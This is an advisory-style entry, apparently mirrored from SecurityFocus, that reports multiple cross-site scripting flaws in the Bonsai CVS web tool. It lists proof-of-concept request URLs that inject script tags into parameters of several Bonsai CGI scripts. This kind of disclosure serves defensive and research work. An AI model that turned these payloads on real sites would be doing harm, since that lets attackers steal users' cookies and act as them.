18 lines
No EOL
1.3 KiB
Text
18 lines
No EOL
1.3 KiB
Text
source: https://www.securityfocus.com/bid/5516/info
|
|
|
|
Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool.
|
|
|
|
An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Attacker-supplied code may execute within the context of the site hosting the vulnerable software when the malicious link is visited.
|
|
|
|
This type of vulnerability may be used to steal cookies or perform other web-based attacks. It may be possible to take actions as an user of the Bonsai system.
|
|
|
|
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
|
|
/webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
|
|
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
|
|
/webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
|
|
/cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>
|
|
&date=<script>alert(document.domain)</script>
|
|
/cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=
|
|
&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
|
|
/showcheckins.cgi?person=<script>alert(document.domain)</script>
|
|
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD |